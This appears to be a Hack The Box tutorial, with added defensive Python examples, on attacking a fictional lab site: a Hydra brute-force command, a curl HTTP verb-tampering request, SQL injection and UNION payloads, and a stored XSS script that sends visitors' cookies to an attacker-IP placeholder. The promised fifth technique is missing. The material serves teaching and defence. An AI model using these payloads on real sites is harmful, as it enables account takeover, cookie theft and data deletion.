Are you looking to learn how to protect the web or just want a more in-depth understanding of how attackers target web applications?
This guide will explore five hacking techniques, ranging from beginner to advanced levels. We’ll cover:
Before we start, it’s important that you note the following “do not try this at home” disclaimer:
These examples are for educational and informative purposes only, and are intended to provide insights into the methods attackers use to compromise website security.
If you want to try these techniques, always practice in a safe, controlled environment such as your local computer or on the Hack The Box (HTB) platform.
Now, let’s rock and roll.
Login brute force
A brute force attack is a trial-and-error approach to a certain feature or service. For our example, we will focus on a web application login. In this case, the application requires a username and password to allow access.
In this scenario, attackers can use a variety of approaches. We will focus on demonstrating what is known as a brute-force dictionary attack.
A typical dictionary brute force attack uses password lists, which are large text files containing thousands of common passwords gathered from years of data breaches.
To simulate our attack, we will use the popular “rockyou.txt” wordlist. But there are all kinds of reputable wordlists, such as the SecLists project, which is maintained by Daniel Miessler, Jason Haddix, and g0tmi1k.
We will conduct our attacks against the web application of the evil “g4rg4m3l”. Let’s help the Smurfs. Remember to always hack for good!
A common username found in all kinds of services and applications is “admin.” So that’s the account we’ll try to brute force.
First, we will try the admin username with the password testing.
As expected, we get back an Invalid username or password error message.
Now we’ll brute force the login with the user admin and the rockyou.txt password list.
We’ll use the Hydra tool to perform this attack from the command line. But, there are plenty of tools that can perform this attack, such as Burp Suite.
hydra -l admin -P /usr/share/wordlists/rockyou.txt -f -vV g4rg4m3l.htb http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid username or password"
Use the:
- -l option to specify the username.
- -P for the password list.
- -f to stop Hydra on the first successful login.
- -vV for verbose output. The string Invalid username or password at the end of the http-post-form argument is the failure condition: Hydra treats any response containing it as an unsuccessful login and moves on to the next password.
As we can see, Hydra checked the passwords one by one until it found the one that corresponds to the user admin, which was password123.
Go ahead and say the line: “We’re in!”
This technique is considered suitable for beginners because it requires minimal skills.
To conduct this attack, attackers only need a basic understanding of how web applications work and proficiency with brute force tools like Hydra and Burp Suite.
HTTP verb tampering
Attackers are always on the lookout for indicators of poor security posture, such as the password for the “g4rg4m3l” website admin user.
These hints alert attackers that a certain web application can be further exploited due to a lack of security.
Upon further exploration, we come across the “G4RG4M3L’s Evil Plans” section of our example website, where he lays out several of his evil plans against the Smurfs.
Each plan includes a “Delete Plan” button. Let’s try to delete those evil plans.
It seems that despite his poor password choices, g4rg4m3l has some sort of protection against the deletion of his plans.
However, when we inspect these actions in the browser developer tools, we notice that the request is made using the DELETE HTTP method.
HTTP Methods (also called verbs) specify the type of actions a web server must perform for a particular request.
By manipulating HTTP verbs, such as changing DELETE to GET, an attacker can tamper with the functionality of a web application, leading to data manipulation and deletion on the server. This works when access controls are applied per method (for example, restricting DELETE but not GET) while the backend code performs the action no matter which method delivered the request.
For our HTTP tampering attack against g4rg4m3l, we’ll change the DELETE verb to GET and send the same request using the cURL command line tool.
curl -X GET -d "evil_plan_id=666f1081b50c" http://g4rg4m3l.htb/evil_plans.php
- The -X option is used to specify the HTTP verb.
- We also need to identify the id of the plan we want to test, which we can obtain through HTML inspection or by selecting COPY DELETE DATA in the browser dev tools.
After we refresh the page, it becomes apparent that changing the HTTP verb led to the first plan’s deletion.
By tampering with HTTP verbs, attackers can interfere with web application functionality, with potentially catastrophic consequences such as deleting data.
To perform these attacks, you’ll need a clear understanding of the HTTP protocol and how web applications work, as well as tools like browser developer tools and cURL.
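To make the failure mode concrete, here is an added example (not code from the original post) that models evil_plans.php as two request dispatchers: a vulnerable one whose access check is bound to the DELETE method, in the style of an Apache <Limit DELETE> block, and a hardened one that validates the method and the session before touching data. The plan store, the is_admin flag and the second plan id are constructed.

```python
# Added example, not code from the original post. Two dispatchers for the
# evil_plans.php endpoint: one vulnerable to verb tampering, one hardened.
# The store contents, the is_admin flag and the second id are constructed.

def make_store():
    """Constructed stand-in for the evil plans table (the first id is the one from the text)."""
    return {"666f1081b50c": "Plan 1: steal the Smurfs' bread", "0badc0ffee00": "Plan 2: dam the river"}

def vulnerable_handler(store, method, params, is_admin):
    """Protection like Apache's <Limit DELETE> only covers the listed method, while
    the backend deletes whenever evil_plan_id arrives, whatever verb carried it."""
    if method == "DELETE" and not is_admin:
        return 403, "Forbidden"
    plan_id = params.get("evil_plan_id")
    if plan_id in store:                 # reached with GET just as easily as with DELETE
        del store[plan_id]
        return 200, "Deleted"
    return 200, "\n".join(store.values())

def hardened_handler(store, method, params, is_admin):
    """Decide on the method first, then authorize; the authorization check is
    not tied to the verb the client chose to send."""
    if method == "GET":
        return 200, "\n".join(store.values())
    if method != "DELETE":
        return 405, "Method Not Allowed"
    if not is_admin:
        return 403, "Forbidden"
    plan_id = params.get("evil_plan_id")
    if plan_id not in store:
        return 404, "Not Found"
    del store[plan_id]
    return 200, "Deleted"

if __name__ == "__main__":
    store = make_store()
    # Same request as the curl command in the text, sent by an anonymous client.
    print(vulnerable_handler(store, "GET", {"evil_plan_id": "666f1081b50c"}, False))  # (200, 'Deleted')
    store = make_store()
    print(hardened_handler(store, "GET", {"evil_plan_id": "666f1081b50c"}, False))    # plan list, nothing deleted
```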
SQL Injection
Let’s revisit the login section. For a simple authentication process, we can assume that the username and its corresponding password are stored in a database.
When the user enters their username and password, a verification process occurs on the backend to check if they exist in that database.
Attackers can take advantage of this process by inserting malicious Structured Query Language (SQL) statements into web form fields instead of the expected user input.
This type of attack, called SQL Injection, can manipulate the database, potentially access sensitive information, and even bypass authentication.
When the submitted username and password match a row in the database, the SQL query returns that row and the application authenticates the user.
However, if the application does not properly protect against these kinds of attacks, an attacker can supply input that turns the condition into one that is always true, such as ' OR '1'='1.
The statement then matches regardless of whether the username and password are correct, which bypasses the authentication check.
These types of vulnerabilities can be further exploited and potentially lead to data exfiltration when the malicious code tricks the database into exposing information.
For our example, we'll inject the query UNION SELECT id, username, password, email FROM users -- to try to access sensitive information in the database (the trailing -- turns the rest of the original statement into a comment).
By injecting a UNION SELECT statement, we append our own query to the original one and can potentially retrieve data from other tables.
By injecting our crafted query, we were able to retrieve information about the users stored in the application database.
We can use these credentials to access different user accounts in further attacks against the website.
It’s important to note that attackers need to follow several steps in order to create a functioning SQL statement.
💡Note: The exact methods and techniques used in these attacks vary greatly depending on the configuration and design of each database.
In addition to the previously mentioned skills, this website hacking technique requires familiarity with web application infrastructures, databases, and SQL.
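The login query as described above, written out as an added example (not code from the original post) so the defect and its fix sit side by side: one login function concatenates the form fields into the SQL text, the other uses a parameterized query. It runs against a constructed in-memory SQLite users table; the second user and the e-mail addresses are made up, and the two payloads are the ones quoted in the text.

```python
import sqlite3

def build_db():
    """Constructed in-memory stand-in for the application's users table.
    Passwords are kept in clear only to keep the example short; a real
    application stores a salted hash and compares against that."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", [
        (1, "admin", "password123", "admin@g4rg4m3l.htb"),
        (2, "smurfette", "bluebird42", "smurfette@g4rg4m3l.htb"),
    ])
    return conn

def login_vulnerable(conn, username, password):
    """Builds the statement by string concatenation, so a quote in the input
    closes the literal and the rest of the input is parsed as SQL syntax."""
    sql = ("SELECT id, username, password, email FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchall()

def login_safe(conn, username, password):
    """Parameterized query: the SQL text is fixed and the values travel
    separately, so user input can never change the statement's structure."""
    sql = ("SELECT id, username, password, email FROM users "
           "WHERE username = ? AND password = ?")
    return conn.execute(sql, (username, password)).fetchall()

if __name__ == "__main__":
    conn = build_db()
    # The two payloads from the text, sent to the vulnerable and the safe login.
    bypass = "' OR '1'='1"
    union = "x' UNION SELECT id, username, password, email FROM users -- "
    print(login_vulnerable(conn, "admin", bypass))   # every row matches: authentication bypassed
    print(login_vulnerable(conn, union, ""))          # the whole users table comes back
    print(login_safe(conn, "admin", bypass))          # []
    print(login_safe(conn, union, ""))                # []
```

The safe variant returns the same row as the vulnerable one for a correct username and password, so the fix changes nothing for legitimate users.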
Cross-site scripting (XSS) / cookie theft
Cross-site scripting (XSS) attacks are a type of injection web hacking technique where an attacker can insert malicious code into a web application.
These attacks usually happen when an application accepts user input without proper validation.
Cross-site scripting lets malicious code blend in with legitimate content, ultimately giving attackers access to sensitive information, cookies and session tokens, and even the ability to modify the content of the web application.
There are several kinds of XSS attacks. We will focus on what’s known as Stored XSS, which can obtain cookies from unsuspecting users.
Stored XSS is an attack where malicious code is permanently injected into, or "stored" on, the target, for example in a blog's comment section, a post, or a message.
When we access the comment section of our target web application, we can input a malicious script that begins with a <script> tag.
This tag instructs the browser to run the enclosed JavaScript code. The script looks like this:
<script>var img = new Image(); img.src="http://<attacker-IPaddress>:666/steal-cookies.php?cookie=" + document.cookie;</script>
Once executed, it creates a new image object that prompts the browser to send a GET request to a malicious URL.
When an unsuspecting visitor goes to the page, their browser will interpret the HTML and execute this code, which sends their cookie to the attacker’s URL.
With the payload stored, it becomes a waiting game: whenever a visitor loads g4rg4m3l's page, their cookies arrive at our listener.
After a while, our attacker server captures a cookie from one of g4rg4m3l’s visitors. We’ll show you how to receive a connection back to our machine in our next example.
To execute these attacks, you must have all of the previously mentioned skills as well as proficiency with programming languages like Python, PHP, and JavaScript.
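The two controls that defeat this cookie theft, as an added example that is not code from the original post: output encoding when the comment is rendered, so the stored <script> tag is displayed as text rather than executed, and an HttpOnly session cookie, so document.cookie does not expose the session even if a script does run. The comment payload mirrors the one above with a labelled placeholder for the attacker host; the cookie name PHPSESSID and the session value are assumptions.

```python
import html
from http.cookies import SimpleCookie

# Constructed comment body: the payload from the text with a placeholder host.
PAYLOAD = ('<script>var img = new Image(); img.src="http://ATTACKER-IP-PLACEHOLDER:666'
           '/steal-cookies.php?cookie=" + document.cookie;</script>')

def render_comment_vulnerable(author, body):
    """Places the stored comment in the page unchanged, so a <script> tag inside
    it runs in every visitor's browser."""
    return f"<div class='comment'><b>{author}</b>: {body}</div>"

def render_comment_safe(author, body):
    """Context-aware output encoding for HTML body text: <, >, &, and quotes
    become entities, so the browser shows the payload instead of executing it."""
    return f"<div class='comment'><b>{html.escape(author)}</b>: {html.escape(body)}</div>"

def session_cookie_header(session_id, name="PHPSESSID"):
    """Build the Set-Cookie header for the session cookie. HttpOnly keeps the
    value out of document.cookie; Secure and SameSite limit where it is sent."""
    c = SimpleCookie()
    c[name] = session_id
    c[name]["httponly"] = True
    c[name]["secure"] = True
    c[name]["samesite"] = "Lax"
    c[name]["path"] = "/"
    return c.output(header="Set-Cookie:")

if __name__ == "__main__":
    print(render_comment_vulnerable("visitor", PAYLOAD))   # script tag intact: executes
    print(render_comment_safe("visitor", PAYLOAD))         # &lt;script&gt;...: inert text
    print(session_cookie_header("constructed-session-id"))
```

Encoding at output time neutralizes the payload already sitting in the database, which input validation alone cannot do after the fact.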
When web applications fail to validate user inputs, attackers can further exploit them to execute arbitrary commands on the host Operating System (OS) potentially compromising the system entirely.
Become a certified website hacking specialist
We have covered some common techniques for hacking websites from beginner to advanced levels:
Bear in mind that we made these difficulty classifications based on the varying levels of knowledge in different areas that a web app penetration tester must have.
The nature and complexity of web applications make each one unique. So an attack that we classified as “advanced” may actually be relatively easy to perform, if the web application has weak security. Similarly, a “beginner” level attack against a very secure website may be very complicated.
Understanding how attackers operate and learning the different techniques they use is crucial for protection and safety. We encourage you to explore all of the recommended modules and get hands-on practice.
Consider choosing a Job Role Path on Hack The Box Academy or a cybersecurity certification.
These resources will guide you through the Academy modules, helping you develop practical skills and the necessary mindset for a particular job role, such as a pentester, web app security expert, or SOC analyst.
Stay safe, be ethical, keep learning, and rock n’ roll!
hackers.top from www.hackthebox.com